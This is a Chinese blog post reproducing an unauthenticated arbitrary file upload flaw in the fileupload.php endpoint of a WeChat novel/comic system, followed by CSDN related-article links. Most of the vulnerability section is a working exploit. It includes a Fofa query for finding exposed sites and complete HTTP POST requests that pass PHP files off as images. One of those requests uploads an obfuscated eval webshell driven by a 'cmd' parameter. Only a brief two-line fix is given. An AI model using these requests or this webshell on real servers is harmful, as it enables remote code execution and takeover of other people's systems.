微信公众号小说漫画系统 fileupload.php 任意文件上传复现

最新推荐文章于 2024-10-11 09:01:38 发布
最新推荐文章于 2024-10-11 09:01:38 发布
阅读量557 收藏 4
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142827627
版权

0x01 漏洞描述:

        在微信公众号小说漫画系统的 fileupload.php 接口中,存在任意文件上传漏洞,该漏洞允许未经身份验证的攻击者上传恶意文件,从而实现代码执行。这种安全隐患使得攻击者能够在服务器上写入后门程序,获取服务器权限,并最终控制整个 Web 服务器。攻击者可能借助重命名文件、伪造 MIME 类型等手段绕过文件类型限制,构造包含恶意代码的文件进行上传。一旦上传成功,攻击者便可通过访问该文件的 URL 执行其中的代码,造成严重的安全威胁。

0x02 搜索语句:

Fofa:"/Public/home/mhjs/jquery.js"

0x03 漏洞复现:

POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAW4kl2MUmkWNAgBW
Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; curIndex=3; uloginid=586639
Host: your-ip
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/Public/webuploader/0.1.5/server/fileupload.php
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1

------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--

上传成功后访问接口 访问文件路径进行访问

https://your-ip/Public/webuploader/0.1.5/server/upload/1.php

webshell上传

POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAW4kl2MUmkWNAgBW
Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; curIndex=3; uloginid=586639
Host: your-ip
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/Public/webuploader/0.1.5/server/fileupload.php
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1

------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: image/jpeg

<?php class G643t6Jo { public function __construct($HPyRR){ @eval("/*Z20S9180P1*/".$HPyRR."/*Z20S9180P1*/"); }}new G643t6Jo($_REQUEST['cmd']);?>
------WebKitFormBoundary03rNBzFMIytvpWhy--

 

 建立连接

0x04 修复建议:

限制上传文件后缀

关闭互联网暴露面或接口设置访问权限

iSee857
关注
专栏目录
微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞复现
0xSec
10-08 312
微信公众号小说漫画系统 fileupload.php 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
微商城系统api.php接口存在任意文件上传漏洞
nnn2188185的博客
08-23 40
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发微商城系统
【漏洞复现微信公众号小说漫画系统 fileupload.php 任意文件上传
qq_48368964的博客
10-08 1034
微信公众号小说漫画系统包含前端界面、后端逻辑、数据库设计以及其他必要的功能模块,能够支持多终端访问,如微信小程序、H5网页、微信公众号以及原生APP等。系统内置了丰富的小说漫画资源,涵盖各类题材和风格,满足不同用户的阅读需求。同时,它还支持作者入驻和作品上传,有助于促进内容生态的繁荣。微信公众号小说漫画系统 fileupload.php 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
「漏洞复现微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞
最新发布
qq_39894062的博客
10-11 372
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
奇安信天擎 rptsvr 任意文件上传
weixin_62352348的博客
01-29 535
奇安信天擎终端安全管理系统V6.7.0.4130前台文件上传漏洞(XVE-2023-24876)
9月末-10月初新增漏洞汇总|威胁情报第|漏洞订阅
weixin_43167326的博客
10-10 411
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
Likeshop任意文件上传(CVE-2024-0352)
weixin_62352348的博客
01-29 379
Likeshop是一款完全开源免费的B2B2C多商户商城系统,旨在为企业提供强大的电子商务平台。无论是官方旗舰店、商家入驻、平台抽佣+商家独立结算还是统一下单+订单拆分,Likeshop都提供了全面的解决方案,满足企业的不同需求。该产品存在任意文件上传漏洞。
day3-HVV 再添新成员,八贱客登场:xx康、xx达、锐xx、科xx
智慧网络病毒猎手的博客
07-31 1719
最新2024HVV 漏洞/IOC/木马 情报
锐捷 NBR 路由器 fileupload.php 任意文件上传
weixin_43567873的博客
03-08 256
锐捷 NBR 路由器 fileupload.php 任意文件上传
【漏洞复现】万户OA-ezOFFICE fileUpload.controller 任意文件上传漏洞
凝聚力安全团队
07-27 655
万户OA-ezOFFICE DocumentEdit_unite.jsp 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统安全性。
锐捷NBR路由器fileupload.php任意文件上传漏洞
xiaokp7的博客
09-13 1649
锐捷NBR路由器是锐捷网络科技有限公司推出的一款高性能企业级路由器。NBR是"Next-Generation Broadband Router"的缩写,意为"下一代宽带路由器"。该路由器具有强大的处理能力和丰富的功能,适用于中小型企业、校园网络和数据中心等场景。锐捷 NBR 路由器 存在任意文件上传漏洞,可能导致执行恶意代码、服务器拒绝服务、数据泄露、网站篡改和横向渗透等危害。
【漏洞复现】致远OA fileUpload.do 任意文件上传漏洞
凝聚力安全团队
09-03 1155
致远OA fileUpload.do 接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 1051
信息安全工程师——机房安全分析与防护篇
【银河麒麟高级服务器操作系统安全配置基线相关分析全过程及解决方案
银河麒麟操作系统的博客
10-10 701
现象描述:安全基线在银河麒麟高级服务器操作系统V10 sp2和V10 sp3能生效,在V10 sp1-0518系统版本上添加如上内容未生效。系统测试分析情况,可知,在银河麒麟高级服务器操作系统V10系统中,限制实现只有属于wheel组的用户才被允许使用su命令来切换到root用户这个安全基线功能,是需要在/etc/pam.d/su配置文件的pam_wheel.so模块后面,通过追加use_uid这个模块配置参数实现的。
鸿蒙开发(NEXT/API 12)【安全单元访问开发】网络篇
鸿蒙的技术博客
10-10 312
安全单元(SecureElement,简称SE),电子设备上可能存在一个或多个安全单元,比如有eSE(Embedded SE)和SIM卡。能够充当安全单元的SIM卡,要求具备NFC功能。
PWN二进制安全修仙秘籍【第二章#二进制文件篇02】ELF文件详解
weixin_53801131的博客
10-07 731
形成一个进程镜像,每个进程都拥有独立的虚拟地址空间,这个空间如何布局是由记录在段头表中的程序头决定的。ELF文件头的e_phoff域给出了段头表的位置下面将展示一个可执行文件的程序头👇。
【隐私计算篇】多方安全计算之函数秘密共享(FSS)
源泉的小广场
10-04 1176
fss、函数秘密共享、函数秘密分享、分布式点函数、DPF、Distributed Point Function、多方安全计算、安全多方计算、MPC、多服务器PIR、SilentOT、PCG for tensor product from LPN and FSS
数据交换的金钟罩:合理利用安全数据交换系统,确保信息安全
文件数据安全交换
10-10 768
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。因此飞驰云联的安全数据交换系统---《Ftrans Ferry跨网文件安全交换系统》,通过建立可管控可审计、防泄露、安全合规的文件交换通道,解决政府单位在网络隔离条件下, 网间数据安全收发、摆渡和共享的难题,易用便捷,充分释放IT部门人力投入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值